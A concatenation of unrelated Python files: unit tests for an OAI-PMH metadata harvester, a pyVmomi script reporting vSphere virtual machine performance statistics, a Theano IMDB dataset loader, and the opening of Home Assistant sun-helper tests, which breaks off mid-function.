            [mock.call(i) for i in ['i1', 'i2', 'i3']]
        )
        self.assertItemsEqual(new_ids, ['i1', 'i2', 'i3'])
    def test_invalid_identifiers(self):
        """Identifiers that fail unicode conversion raise HarvestError."""
        class InvalidId(object):
            def __unicode__(self):
                raise TypeError('conversion failed')
        provider = mock.Mock()
        provider.identifiers.return_value = [
            'ok', InvalidId(), 'oai:1234',
        ]
        with mock.patch.object(harvest, 'models') as models:
            models.Item.list.return_value = []
            with self.assertRaises(HarvestError) as cm:
                harvest.update_items(provider)
        self.assertIn('conversion failed', cm.exception.message)
    def test_dry_run(self):
        """A dry run logs the would-be changes without touching the models."""
        provider = mock.Mock()
        provider.identifiers.return_value = ['asd']
        item_mock = make_item(u'1234')
        with LogCapture(harvest) as log:
            with mock.patch.object(harvest, 'models') as models:
                models.Item.list.return_value = [item_mock]
                harvest.update_items(provider, purge=True, dry_run=True)
        self.assertEqual(models.Item.create_or_update.mock_calls, [])
        self.assertEqual(models.purge_deleted.mock_calls, [])
        self.assertEqual(models.commit.mock_calls, [])
        self.assertEqual(item_mock.mark_as_deleted.mock_calls, [])
        log.assert_emitted('Removed 1 item and added 1 item.')
class TestUpdateRecords(unittest.TestCase):
    """Tests for harvest.update_records."""
    def test_successful_harvest(self):
        """Changed items are disseminated in every format and committed."""
        prefixes = [u'ead', u'oai_dc']
        identifiers = [u'item{0}'.format(i) for i in xrange(4)]
        time = datetime(2014, 2, 4, 10, 54, 27)
        provider = mock.Mock()
        provider.get_record.return_value = '<xml ... />'
        # item2 is reported as unchanged and must be skipped entirely.
        provider.has_changed.side_effect = (
            lambda identifier, _: identifier != u'item2'
        )
        with LogCapture(harvest) as log:
            with mock.patch.object(harvest, 'models') as models:
                with mock.patch.object(harvest, 'update_sets') as (
                        update_sets_mock):
                    harvest.update_records(
                        provider, identifiers, prefixes, time)
        self.assertItemsEqual(
            provider.get_record.mock_calls,
            [mock.call(id_, prefix)
             for id_ in [u'item0', u'item1', u'item3']
             for prefix in [u'ead', u'oai_dc']]
        )
        self.assertItemsEqual(
            update_sets_mock.mock_calls,
            [mock.call(provider, id_, False)
             for id_ in [u'item0', u'item1', u'item3']],
        )
        self.assertItemsEqual(
            models.Record.create_or_update.mock_calls,
            [mock.call(id_, prefix, '<xml ... />')
             for id_ in [u'item0', u'item1', u'item3']
             for prefix in [u'ead', u'oai_dc']]
        )
        # One commit per record update: 3 changed items x 2 formats = 6.
        self.assertEqual(
            models.commit.mock_calls,
            [mock.call() for _ in xrange(6)]
        )
        log.assert_emitted('Skipping item "item2"')
        log.assert_emitted('Updated 6 records.')
    def test_no_time(self):
        """Without a since-timestamp the change check is bypassed."""
        prefixes = [u'oai_dc']
        items = [u'oai:test:id']
        provider = mock.Mock()
        provider.get_record.return_value = '<oai_dc:dc>...</oai_dc:dc>'
        with mock.patch.object(harvest, 'update_sets'):
            with mock.patch.object(harvest, 'models') as models:
                harvest.update_records(
                    provider, items, prefixes, since=None)
        self.assertEqual(provider.has_changed.mock_calls, [])
        provider.get_record.assert_called_once_with(
            u'oai:test:id', u'oai_dc')
    def test_no_records(self):
        """Nothing is queried or committed for an empty item list."""
        provider = mock.Mock()
        time = datetime(2014, 2, 4, 10, 54, 27)
        with mock.patch.object(harvest, 'models') as models:
            harvest.update_records(provider, [], [u'ead'], since=time)
        self.assertEqual(provider.has_changed.mock_calls, [])
        self.assertEqual(provider.get_record.mock_calls, [])
        self.assertEqual(models.commit.mock_calls, [])
    def test_harvest_fails(self):
        """A dissemination failure for one item does not abort the others."""
        items = ['id1', 'id2']
        xml = 'data'
        def get_record(id_, prefix):
            if id_ == 'id1':
                raise ValueError('crosswalk error')
            else:
                return xml
        provider = mock.Mock()
        provider.get_record.side_effect = get_record
        with mock.patch.object(harvest, 'update_sets'):
            with mock.patch.object(harvest, 'models') as models:
                with LogCapture(harvest) as log:
                    harvest.update_records(provider, items, [u'ead'])
        models.Record.create_or_update.assert_called_once_with(
            'id2', 'ead', xml)
        log.assert_emitted(
            'Failed to disseminate format "ead" for item "id1"')
        log.assert_emitted('crosswalk error')
    def test_deleted_record(self):
        """A None dissemination marks the record as deleted."""
        provider = mock.Mock()
        provider.get_record.return_value = None
        with mock.patch.object(harvest, 'update_sets'):
            with mock.patch.object(harvest, 'models') as models:
                harvest.update_records(
                    provider, [u'some_item'], [u'oai_dc'])
        models.Record.mark_as_deleted.assert_called_once_with(
            u'some_item', u'oai_dc',
        )
    def test_update_sets_fails(self):
        """A set-update failure is logged per item and does not abort the run."""
        items = [u'item1', u'item2']
        provider = mock.Mock()
        provider.get_record.return_value = '<oai_dc:dc>...</oai_dc:dc>'
        with mock.patch.object(harvest, 'update_sets') as (
                update_sets_mock):
            update_sets_mock.side_effect = ValueError('invalid set spec')
            with mock.patch.object(harvest, 'models') as models:
                with LogCapture(harvest) as log:
                    harvest.update_records(provider, items, [u'oai_dc'])
        self.assertItemsEqual(
            update_sets_mock.mock_calls,
            [mock.call(provider, id_, False)
             for id_ in [u'item1', u'item2']],
        )
        log.assert_emitted('Failed to update item "item1"')
        log.assert_emitted('Failed to update item "item2"')
        log.assert_emitted('invalid set spec')
    def test_delete_single_record(self):
        """Per-format outcomes are independent: error, deletion, and update."""
        formats = [u'oai_dc', u'ead', u'ddi']
        def get_record(id_, prefix):
            if prefix == u'oai_dc':
                raise ValueError('invalid data')
            elif prefix == u'ead':
                return None
            elif prefix == u'ddi':
                return 'data'
        provider = mock.Mock()
        provider.get_record.side_effect = get_record
        provider.get_sets.return_value = []
        with mock.patch.object(harvest, 'models') as models:
            harvest.update_records(provider, [u'pelle'], formats)
        models.Record.mark_as_deleted.assert_called_once_with(
            u'pelle', u'ead')
        models.Record.create_or_update.assert_called_once_with(
            u'pelle', u'ddi', 'data')
    def test_dry_run(self):
        """A dry run forwards dry_run=True to update_sets and skips all writes."""
        time = datetime(2014, 2, 4, 10, 54, 27)
        provider = mock.Mock()
        provider.get_record.return_value = '<xml ... />'
        provider.has_changed.return_value = True
        with LogCapture(harvest) as log:
            with mock.patch.object(harvest, 'models') as models:
                with mock.patch.object(harvest, 'update_sets') as (
                        update_sets_mock):
                    harvest.update_records(
                        provider,
                        ['item1'],
                        ['oai_dc'],
                        time,
                        dry_run=True,
                    )
        update_sets_mock.assert_called_once_with(provider, u'item1', True)
        self.assertEqual(models.Record.create_or_update.mock_calls, [])
        self.assertEqual(models.commit.mock_calls, [])
        log.assert_emitted('Updated 1 record.')
class TestUpdateSets(unittest.TestCase):
    """Tests for harvest.update_sets."""
    def test_valid_sets(self):
        """Set specs are created in sorted order and attached to the item."""
        provider = mock.Mock()
        provider.get_sets.return_value = [
            (u'a:b', 'Set B'),
            ('a', u'Set A'),
            ('a:b:c', 'Set C'),
        ]
        with mock.patch.object(harvest, 'models') as models:
            harvest.update_sets(provider, 'oai:example.org:item')
        models.Item.get.assert_called_once_with('oai:example.org:item')
        item = models.Item.get.return_value
        item.clear_sets.assert_called_once_with()
        # Exact order matters here: specs must come out sorted ('a' first).
        self.assertEqual(
            models.Set.create_or_update.mock_calls,
            [mock.call('a', u'Set A'),
             mock.call(u'a:b', 'Set B'),
             mock.call('a:b:c', 'Set C')]
        )
        set_ = models.Set.create_or_update.return_value
        self.assertEqual(
            item.add_to_set.mock_calls,
            [mock.call(set_) for _ in xrange(3)]
        )
    def test_no_sets(self):
        """An item without sets is cleared but gets nothing added."""
        provider = mock.Mock()
        provider.get_sets.return_value = []
        with mock.patch.object(harvest, 'models') as models:
            harvest.update_sets(provider, 'item')
        item = models.Item.get.return_value
        item.clear_sets.assert_called_once_with()
        self.assertEqual(item.add_to_set.mock_calls, [])
    def test_dry_run(self):
        """A dry run must not touch the models layer at all."""
        provider = mock.Mock()
        provider.get_sets.return_value = [(u'a', 'Set Name')]
        with mock.patch.object(harvest, 'models') as models:
            # (A stray no-op `models.Item` expression statement was removed here.)
            harvest.update_sets(
                provider,
                'oai:example.org:item',
                dry_run=True,
            )
        item_mock = models.Item.get.return_value
        self.assertEqual(item_mock.clear_sets.mock_calls, [])
        self.assertEqual(models.Set.create_or_update.mock_calls, [])
        self.assertEqual(item_mock.add_to_set.mock_calls, [])
| |
#!/usr/bin/env python
"""
Python program that generates various statistics for one or more virtual machines
A list of virtual machines can be provided as a comma separated list.
"""
from __future__ import print_function
from pyVim.connect import SmartConnect, Disconnect
from pyVmomi import vmodl, vim
from datetime import timedelta, datetime
import argparse
import atexit
import getpass
import ssl
def GetArgs():
    """Parse and return the command-line arguments for this script.

    Required: -s/--host, -u/--user, -m/--vm.  Optional: -o/--port (443),
    -p/--password (prompted for when omitted), -c/--cert_check_skip and
    -i/--interval (15 minutes).
    """
    parser = argparse.ArgumentParser(description='Process args for retrieving all the Virtual Machines')
    parser.add_argument('-s', '--host', required=True, action='store', help='Remote host to connect to')
    parser.add_argument('-o', '--port', type=int, default=443, action='store', help='Port to connect on')
    parser.add_argument('-u', '--user', required=True, action='store', help='User name to use when connecting to host')
    parser.add_argument('-p', '--password', required=False, action='store',
                        help='Password to use when connecting to host')
    # Fixed typo in the user-facing help text ('On eor more' -> 'One or more').
    parser.add_argument('-m', '--vm', required=True, action='store', help='One or more Virtual Machines to report on')
    parser.add_argument('-c', '--cert_check_skip', required=False, action='store_true', help='skip ssl certificate check')
    parser.add_argument('-i', '--interval', type=int, default=15, action='store',
                        help='Interval to average the vSphere stats over')
    args = parser.parse_args()
    return args
def BuildQuery(content, vchtime, counterId, instance, vm, interval):
    """Run a PerformanceManager query for one counter on one entity.

    Queries 20-second samples over a window from (interval + 1) minutes
    to 1 minute before *vchtime*.  Returns the perf results, or prints
    troubleshooting info and terminates the program when they are empty.
    """
    perfManager = content.perfManager
    metricId = vim.PerformanceManager.MetricId(counterId=counterId, instance=instance)
    startTime = vchtime - timedelta(minutes=(interval + 1))
    endTime = vchtime - timedelta(minutes=1)
    query = vim.PerformanceManager.QuerySpec(intervalId=20, entity=vm, metricId=[metricId], startTime=startTime,
                                             endTime=endTime)
    perfResults = perfManager.QueryPerf(querySpec=[query])
    if perfResults:
        return perfResults
    else:
        print('ERROR: Performance results empty. TIP: Check time drift on source and vCenter server')
        print('Troubleshooting info:')
        print('vCenter/host date and time: {}'.format(vchtime))
        print('Start perf counter time : {}'.format(startTime))
        print('End perf counter time : {}'.format(endTime))
        print(query)
        # NOTE(review): exit() terminates the whole program from a helper;
        # raising an exception and handling it in the caller would be cleaner.
        exit()
def PrintVmInfo(vm, content, vchtime, interval, perf_dict, ):
    """Print configuration and averaged performance statistics for one VM.

    :param vm: managed object reference of a powered-on virtual machine
    :param content: vCenter ServiceInstance content
    :param vchtime: vCenter server time used as the query baseline
    :param interval: averaging window in minutes
    :param perf_dict: mapping of 'group.name.rollup' -> perf counter id
    """
    statInt = interval * 3  # There are 3 20s samples in each minute
    summary = vm.summary
    disk_list = []
    network_list = []
    # Convert limit and reservation values from -1 to None
    if vm.resourceConfig.cpuAllocation.limit == -1:
        vmcpulimit = "None"
    else:
        vmcpulimit = "{} Mhz".format(vm.resourceConfig.cpuAllocation.limit)
    if vm.resourceConfig.memoryAllocation.limit == -1:
        vmmemlimit = "None"
    else:
        vmmemlimit = "{} MB".format(vm.resourceConfig.memoryAllocation.limit)
    if vm.resourceConfig.cpuAllocation.reservation == 0:
        vmcpures = "None"
    else:
        vmcpures = "{} Mhz".format(vm.resourceConfig.cpuAllocation.reservation)
    if vm.resourceConfig.memoryAllocation.reservation == 0:
        vmmemres = "None"
    else:
        vmmemres = "{} MB".format(vm.resourceConfig.memoryAllocation.reservation)
    vm_hardware = vm.config.hardware
    # Device keys 2000-2999 are collected as disks, 4000-4999 as NICs.
    for each_vm_hardware in vm_hardware.device:
        if (each_vm_hardware.key >= 2000) and (each_vm_hardware.key < 3000):
            disk_list.append('{} | {:.1f}GB | Thin: {} | {}'.format(each_vm_hardware.deviceInfo.label,
                                                                    each_vm_hardware.capacityInKB/1024/1024,
                                                                    each_vm_hardware.backing.thinProvisioned,
                                                                    each_vm_hardware.backing.fileName))
        elif (each_vm_hardware.key >= 4000) and (each_vm_hardware.key < 5000):
            network_list.append('{} | {} | {}'.format(each_vm_hardware.deviceInfo.label,
                                                      each_vm_hardware.deviceInfo.summary,
                                                      each_vm_hardware.macAddress))
    #CPU Ready Average
    statCpuReady = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'cpu.ready.summation')), "", vm, interval)
    cpuReady = (float(sum(statCpuReady[0].value[0].value)) / statInt)
    #CPU Usage Average % - NOTE: values are type LONG so needs divided by 100 for percentage
    statCpuUsage = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'cpu.usage.average')), "", vm, interval)
    cpuUsage = ((float(sum(statCpuUsage[0].value[0].value)) / statInt) / 100)
    #Memory Active Average MB
    statMemoryActive = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'mem.active.average')), "", vm, interval)
    memoryActive = (float(sum(statMemoryActive[0].value[0].value) / 1024) / statInt)
    #Memory Shared
    statMemoryShared = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'mem.shared.average')), "", vm, interval)
    memoryShared = (float(sum(statMemoryShared[0].value[0].value) / 1024) / statInt)
    #Memory Balloon
    statMemoryBalloon = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'mem.vmmemctl.average')), "", vm, interval)
    memoryBalloon = (float(sum(statMemoryBalloon[0].value[0].value) / 1024) / statInt)
    #Memory Swapped
    statMemorySwapped = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'mem.swapped.average')), "", vm, interval)
    memorySwapped = (float(sum(statMemorySwapped[0].value[0].value) / 1024) / statInt)
    #Datastore Average IO - instance "*" aggregates across all datastores
    statDatastoreIoRead = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'datastore.numberReadAveraged.average')),
                                     "*", vm, interval)
    DatastoreIoRead = (float(sum(statDatastoreIoRead[0].value[0].value)) / statInt)
    statDatastoreIoWrite = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'datastore.numberWriteAveraged.average')),
                                      "*", vm, interval)
    DatastoreIoWrite = (float(sum(statDatastoreIoWrite[0].value[0].value)) / statInt)
    #Datastore Average Latency
    statDatastoreLatRead = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'datastore.totalReadLatency.average')),
                                      "*", vm, interval)
    DatastoreLatRead = (float(sum(statDatastoreLatRead[0].value[0].value)) / statInt)
    statDatastoreLatWrite = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'datastore.totalWriteLatency.average')),
                                       "*", vm, interval)
    DatastoreLatWrite = (float(sum(statDatastoreLatWrite[0].value[0].value)) / statInt)
    #Network usage (Tx/Rx) - KBps samples converted to kilobits (x8)
    statNetworkTx = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'net.transmitted.average')), "", vm, interval)
    networkTx = (float(sum(statNetworkTx[0].value[0].value) * 8 / 1024) / statInt)
    statNetworkRx = BuildQuery(content, vchtime, (StatCheck(perf_dict, 'net.received.average')), "", vm, interval)
    networkRx = (float(sum(statNetworkRx[0].value[0].value) * 8 / 1024) / statInt)
    print('\nNOTE: Any VM statistics are averages of the last {} minutes\n'.format(statInt / 3))
    print('Server Name :', summary.config.name)
    print('Description :', summary.config.annotation)
    print('Guest :', summary.config.guestFullName)
    if vm.rootSnapshot:
        print('Snapshot Status : Snapshots present')
    else:
        print('Snapshot Status : No Snapshots')
    print('VM .vmx Path :', summary.config.vmPathName)
    try:
        print('Virtual Disks :', disk_list[0])
        if len(disk_list) > 1:
            disk_list.pop(0)
            for each_disk in disk_list:
                print(' ', each_disk)
    except IndexError:
        pass
    # NOTE(review): unlike disk_list above, network_list[0] is not guarded;
    # a VM with no NICs would raise an uncaught IndexError here.
    print('Virtual NIC(s) :', network_list[0])
    if len(network_list) > 1:
        network_list.pop(0)
        for each_vnic in network_list:
            print(' ', each_vnic)
    print('[VM] Limits : CPU: {}, Memory: {}'.format(vmcpulimit, vmmemlimit))
    print('[VM] Reservations : CPU: {}, Memory: {}'.format(vmcpures, vmmemres))
    print('[VM] Number of vCPUs :', summary.config.numCpu)
    print('[VM] CPU Ready : Average {:.1f} %, Maximum {:.1f} %'.format((cpuReady / 20000 * 100),
                                                                       ((float(max(
                                                                           statCpuReady[0].value[
                                                                               0].value)) / 20000 * 100))))
    print('[VM] CPU (%) : {:.0f} %'.format(cpuUsage))
    print('[VM] Memory : {} MB ({:.1f} GB)'.format(summary.config.memorySizeMB, (float(summary.config.memorySizeMB) / 1024)))
    print('[VM] Memory Shared : {:.0f} %, {:.0f} MB'.format(
        ((memoryShared / summary.config.memorySizeMB) * 100), memoryShared))
    print('[VM] Memory Balloon : {:.0f} %, {:.0f} MB'.format(
        ((memoryBalloon / summary.config.memorySizeMB) * 100), memoryBalloon))
    print('[VM] Memory Swapped : {:.0f} %, {:.0f} MB'.format(
        ((memorySwapped / summary.config.memorySizeMB) * 100), memorySwapped))
    print('[VM] Memory Active : {:.0f} %, {:.0f} MB'.format(
        ((memoryActive / summary.config.memorySizeMB) * 100), memoryActive))
    print('[VM] Datastore Average IO : Read: {:.0f} IOPS, Write: {:.0f} IOPS'.format(DatastoreIoRead,
                                                                                     DatastoreIoWrite))
    print('[VM] Datastore Average Latency : Read: {:.0f} ms, Write: {:.0f} ms'.format(DatastoreLatRead,
                                                                                      DatastoreLatWrite))
    print('[VM] Overall Network Usage : Transmitted {:.3f} Mbps, Received {:.3f} Mbps'.format(networkTx, networkRx))
    print('[Host] Name : {}'.format(summary.runtime.host.name))
    print('[Host] CPU Detail : Processor Sockets: {}, Cores per Socket {}'.format(
        summary.runtime.host.summary.hardware.numCpuPkgs,
        (summary.runtime.host.summary.hardware.numCpuCores / summary.runtime.host.summary.hardware.numCpuPkgs)))
    print('[Host] CPU Type : {}'.format(summary.runtime.host.summary.hardware.cpuModel))
    print('[Host] CPU Usage : Used: {} Mhz, Total: {} Mhz'.format(
        summary.runtime.host.summary.quickStats.overallCpuUsage,
        (summary.runtime.host.summary.hardware.cpuMhz * summary.runtime.host.summary.hardware.numCpuCores)))
    print('[Host] Memory Usage : Used: {:.0f} GB, Total: {:.0f} GB\n'.format(
        (float(summary.runtime.host.summary.quickStats.overallMemoryUsage) / 1024),
        (float(summary.runtime.host.summary.hardware.memorySize) / 1024 / 1024 / 1024)))
def StatCheck(perf_dict, counter_name):
    """Resolve a full dotted counter name to its numeric counter id.

    Raises KeyError when the counter is unknown to this vCenter.
    """
    return perf_dict[counter_name]
def GetProperties(content, viewType, props, specType):
    """Collect the given properties for every object of *specType*.

    Builds a container view, walks it with the PropertyCollector (following
    pagination tokens), and returns a list of dicts mapping property name to
    value, with the managed object reference stored under 'moref'.
    """
    # Build a view and get basic properties for all Virtual Machines
    objView = content.viewManager.CreateContainerView(content.rootFolder, viewType, True)
    tSpec = vim.PropertyCollector.TraversalSpec(name='tSpecName', path='view', skip=False, type=vim.view.ContainerView)
    pSpec = vim.PropertyCollector.PropertySpec(all=False, pathSet=props, type=specType)
    oSpec = vim.PropertyCollector.ObjectSpec(obj=objView, selectSet=[tSpec], skip=False)
    pfSpec = vim.PropertyCollector.FilterSpec(objectSet=[oSpec], propSet=[pSpec], reportMissingObjectsInResults=False)
    retOptions = vim.PropertyCollector.RetrieveOptions()
    totalProps = []
    retProps = content.propertyCollector.RetrievePropertiesEx(specSet=[pfSpec], options=retOptions)
    totalProps += retProps.objects
    # Keep fetching while the collector reports more result pages.
    while retProps.token:
        retProps = content.propertyCollector.ContinueRetrievePropertiesEx(token=retProps.token)
        totalProps += retProps.objects
    objView.Destroy()
    # Turn the output in retProps into a usable dictionary of values
    gpOutput = []
    for eachProp in totalProps:
        propDic = {}
        for prop in eachProp.propSet:
            propDic[prop.name] = prop.val
        propDic['moref'] = eachProp.obj
        gpOutput.append(propDic)
    return gpOutput
def main():
    """Connect to vCenter, resolve the requested VMs and print their stats.

    Returns 0 on success, -1 on connection failure or a caught exception.
    """
    args = GetArgs()
    try:
        vmnames = args.vm
        si = None
        if args.password:
            password = args.password
        else:
            # No -p given: prompt interactively without echoing.
            password = getpass.getpass(prompt="Enter password for host {} and user {}: ".format(args.host, args.user))
        try:
            if args.cert_check_skip:
                # Explicitly disable SSL certificate verification (-c flag).
                context = ssl._create_unverified_context()
                si = SmartConnect(host=args.host,
                                  user=args.user,
                                  pwd=password,
                                  port=int(args.port),
                                  sslContext=context)
            else:
                si = SmartConnect(host=args.host,
                                  user=args.user,
                                  pwd=password,
                                  port=int(args.port))
        except IOError as e:
            # NOTE(review): the connection error is swallowed here; the only
            # feedback the user gets is the generic message below.
            pass
        if not si:
            print('Could not connect to the specified host using specified username and password')
            return -1
        # Make sure the session is closed on interpreter exit.
        atexit.register(Disconnect, si)
        content = si.RetrieveContent()
        # Get vCenter date and time for use as baseline when querying for counters
        vchtime = si.CurrentTime()
        # Get all the performance counters
        perf_dict = {}
        perfList = content.perfManager.perfCounter
        for counter in perfList:
            counter_full = "{}.{}.{}".format(counter.groupInfo.key, counter.nameInfo.key, counter.rollupType)
            perf_dict[counter_full] = counter.key
        retProps = GetProperties(content, [vim.VirtualMachine], ['name', 'runtime.powerState'], vim.VirtualMachine)
        #Find VM supplied as arg and use Managed Object Reference (moref) for the PrintVmInfo
        for vm in retProps:
            if (vm['name'] in vmnames) and (vm['runtime.powerState'] == "poweredOn"):
                PrintVmInfo(vm['moref'], content, vchtime, args.interval, perf_dict)
            elif vm['name'] in vmnames:
                print('ERROR: Problem connecting to Virtual Machine. {} is likely powered off or suspended'.format(vm['name']))
    except vmodl.MethodFault as e:
        print('Caught vmodl fault : ' + e.msg)
        return -1
    except Exception as e:
        print('Caught exception : ' + str(e))
        return -1
    return 0
# Start program
if __name__ == "__main__":
    # NOTE(review): main()'s return code (0 / -1) is discarded here;
    # sys.exit(main()) would propagate it as the process exit status.
    main()
| |
from __future__ import print_function
from six.moves import xrange
import six.moves.cPickle as pickle
import gzip
import os
import numpy
import theano
def prepare_data(seqs, labels, maxlen=None):
    """Create the matrices from the datasets.

    This pads each sequence to the same length: the length of the
    longest sequence or maxlen.

    If maxlen is set, sequences with length >= maxlen are dropped
    (note: dropped, not truncated), and (None, None, None) is returned
    when nothing survives the filter.

    This swaps the axes: the result x has shape (maxlen, n_samples).
    """
    # x: a list of sentences
    lengths = [len(s) for s in seqs]
    if maxlen is not None:
        new_seqs = []
        new_labels = []
        new_lengths = []
        for l, s, y in zip(lengths, seqs, labels):
            if l < maxlen:
                new_seqs.append(s)
                new_labels.append(y)
                new_lengths.append(l)
        lengths = new_lengths
        labels = new_labels
        seqs = new_seqs
        # Every sequence was filtered out; signal the caller with Nones.
        if len(lengths) < 1:
            return None, None, None
    n_samples = len(seqs)
    maxlen = numpy.max(lengths)
    x = numpy.zeros((maxlen, n_samples)).astype('int64')
    x_mask = numpy.zeros((maxlen, n_samples)).astype(theano.config.floatX)
    # x_mask marks real tokens with 1.0 so padding can be ignored downstream.
    for idx, s in enumerate(seqs):
        x[:lengths[idx], idx] = s
        x_mask[:lengths[idx], idx] = 1.
    return x, x_mask, labels
def get_dataset_file(dataset, default_dataset, origin):
    '''Resolve *dataset* to a usable path, downloading it when necessary.

    The name is first tried as given (full path or local file), then
    relative to the package's ``../data`` directory.  When the file is
    still missing and its basename equals *default_dataset*, it is
    downloaded from *origin*.
    '''
    directory, filename = os.path.split(dataset)
    if not directory and not os.path.isfile(dataset):
        # Bare filename that does not exist locally: look in ../data.
        candidate = os.path.join(
            os.path.split(__file__)[0], "..", "data", dataset)
        if os.path.isfile(candidate) or filename == default_dataset:
            dataset = candidate
    if filename == default_dataset and not os.path.isfile(dataset):
        from six.moves import urllib
        print('Downloading data from %s' % origin)
        urllib.request.urlretrieve(origin, dataset)
    return dataset
def load_data(path="imdb_sup.pkl", n_words=100000, valid_portion=0.1, maxlen=None,
              sort_by_len=True):
    '''Loads the supervised dataset and returns (train, valid, test) splits.

    :type path: String
    :param path: The path to the dataset (here IMDB)
    :type n_words: int
    :param n_words: The number of words to keep in the vocabulary.
        All extra words are set to unknown (1).
    :type valid_portion: float
    :param valid_portion: The proportion of the full train set used for
        the validation set.
    :type maxlen: None or positive int
    :param maxlen: the max sequence length we use in the train/valid set.
    :type sort_by_len: bool
    :param sort_by_len: Sort by the sequence length for the train,
        valid and test set. This allows faster execution as it causes
        less padding per minibatch. Another mechanism must be used to
        shuffle the train set at each epoch.
    '''
    #############
    # LOAD DATA #
    #############
    # Load the dataset; the pickle file holds two consecutive objects:
    # the train set followed by the test set.
    path = get_dataset_file(
        path, "imdb.pkl",
        "http://www.iro.umontreal.ca/~lisa/deep/data/imdb.pkl")
    if path.endswith(".gz"):
        f = gzip.open(path, 'rb')
    else:
        f = open(path, 'rb')
    train_set = pickle.load(f)
    test_set = pickle.load(f)
    f.close()
    if maxlen:
        # Drop training sequences whose length is >= maxlen.
        new_train_set_x = []
        new_train_set_y = []
        for x, y in zip(train_set[0], train_set[1]):
            if len(x) < maxlen:
                new_train_set_x.append(x)
                new_train_set_y.append(y)
        train_set = (new_train_set_x, new_train_set_y)
        del new_train_set_x, new_train_set_y
    # split training set into validation set
    train_set_x, train_set_y = train_set
    n_samples = len(train_set_x)
    sidx = numpy.random.permutation(n_samples)
    n_train = int(numpy.round(n_samples * (1. - valid_portion)))
    valid_set_x = [train_set_x[s] for s in sidx[n_train:]]
    valid_set_y = [train_set_y[s] for s in sidx[n_train:]]
    train_set_x = [train_set_x[s] for s in sidx[:n_train]]
    train_set_y = [train_set_y[s] for s in sidx[:n_train]]
    train_set = (train_set_x, train_set_y)
    valid_set = (valid_set_x, valid_set_y)
    def remove_unk(x):
        # Map out-of-vocabulary word indices to the unknown token (1).
        return [[1 if w >= n_words else w for w in sen] for sen in x]
    test_set_x, test_set_y = test_set
    valid_set_x, valid_set_y = valid_set
    train_set_x, train_set_y = train_set
    train_set_x = remove_unk(train_set_x)
    valid_set_x = remove_unk(valid_set_x)
    test_set_x = remove_unk(test_set_x)
    def len_argsort(seq):
        # Indices of seq ordered by the length of each element.
        return sorted(range(len(seq)), key=lambda x: len(seq[x]))
    if sort_by_len:
        sorted_index = len_argsort(test_set_x)
        test_set_x = [test_set_x[i] for i in sorted_index]
        test_set_y = [test_set_y[i] for i in sorted_index]
        sorted_index = len_argsort(valid_set_x)
        valid_set_x = [valid_set_x[i] for i in sorted_index]
        valid_set_y = [valid_set_y[i] for i in sorted_index]
        sorted_index = len_argsort(train_set_x)
        train_set_x = [train_set_x[i] for i in sorted_index]
        train_set_y = [train_set_y[i] for i in sorted_index]
    train = (train_set_x, train_set_y)
    valid = (valid_set_x, valid_set_y)
    test = (test_set_x, test_set_y)
    return train, valid, test
def load_data_unsup(path="imdb_unsup.pkl", n_words=100000, valid_portion=0.1, maxlen=None,
                    sort_by_len=True):
    '''Loads the unsupervised (unlabelled) dataset; returns (train, valid).

    :type path: String
    :param path: The path to the dataset (here IMDB)
    :type n_words: int
    :param n_words: The number of words to keep in the vocabulary.
        All extra words are set to unknown (1).
    :type valid_portion: float
    :param valid_portion: The proportion of the full train set used for
        the validation set.
    :type maxlen: None or positive int
    :param maxlen: the max sequence length we use in the train/valid set
        (note: currently unused in this function).
    :type sort_by_len: bool
    :param sort_by_len: Sort by the sequence length for the train and
        valid set. This allows faster execution as it causes less
        padding per minibatch. Another mechanism must be used to
        shuffle the train set at each epoch.
    '''
    #############
    # LOAD DATA #
    #############
    # Load the dataset; a single pickled object (no labels, no test set).
    path = get_dataset_file(
        path, "imdb.pkl",
        "http://www.iro.umontreal.ca/~lisa/deep/data/imdb.pkl")
    if path.endswith(".gz"):
        f = gzip.open(path, 'rb')
    else:
        f = open(path, 'rb')
    train_set = pickle.load(f)
    f.close()
    # split training set into validation set
    train_set_x = train_set
    n_samples = len(train_set_x)
    sidx = numpy.random.permutation(n_samples)
    n_train = int(numpy.round(n_samples * (1. - valid_portion)))
    valid_set_x = [train_set_x[s] for s in sidx[n_train:]]
    train_set_x = [train_set_x[s] for s in sidx[:n_train]]
    # NOTE(review): the parentheses below are redundant (not tuples) --
    # these assignments simply alias the lists.
    train_set = (train_set_x)
    valid_set = (valid_set_x)
    def remove_unk(x):
        # Map out-of-vocabulary word indices to the unknown token (1).
        return [[1 if w >= n_words else w for w in sen] for sen in x]
    valid_set_x = valid_set
    train_set_x = train_set
    train_set_x = remove_unk(train_set_x)
    valid_set_x = remove_unk(valid_set_x)
    def len_argsort(seq):
        # Indices of seq ordered by the length of each element.
        return sorted(range(len(seq)), key=lambda x: len(seq[x]))
    if sort_by_len:
        sorted_index = len_argsort(valid_set_x)
        valid_set_x = [valid_set_x[i] for i in sorted_index]
        sorted_index = len_argsort(train_set_x)
        train_set_x = [train_set_x[i] for i in sorted_index]
    train_unsup = (train_set_x)
    valid = (valid_set_x)
    return train_unsup, valid
| |
"""The tests for the Sun helpers."""
# pylint: disable=protected-access
import unittest
from unittest.mock import patch
from datetime import timedelta, datetime
from homeassistant.const import SUN_EVENT_SUNRISE, SUN_EVENT_SUNSET
import homeassistant.util.dt as dt_util
import homeassistant.helpers.sun as sun
from tests.common import get_test_home_assistant
# pylint: disable=invalid-name
class TestSun(unittest.TestCase):
    """Test the sun helpers."""

    def setUp(self):
        """Set up things to be run when tests are started."""
        self.hass = get_test_home_assistant()

    def tearDown(self):
        """Stop everything that was started."""
        self.hass.stop()

    def _reference_events(self, astral, when):
        """Compute the six reference event times for *when* via astral.

        Returns (dawn, dusk, solar_midnight, solar_noon, sunrise, sunset).
        Factored out of the three near-identical date-event tests below.
        """
        latitude = self.hass.config.latitude
        longitude = self.hass.config.longitude
        return (
            astral.dawn_utc(when, latitude, longitude),
            astral.dusk_utc(when, latitude, longitude),
            astral.solar_midnight_utc(when, longitude),
            astral.solar_noon_utc(when, longitude),
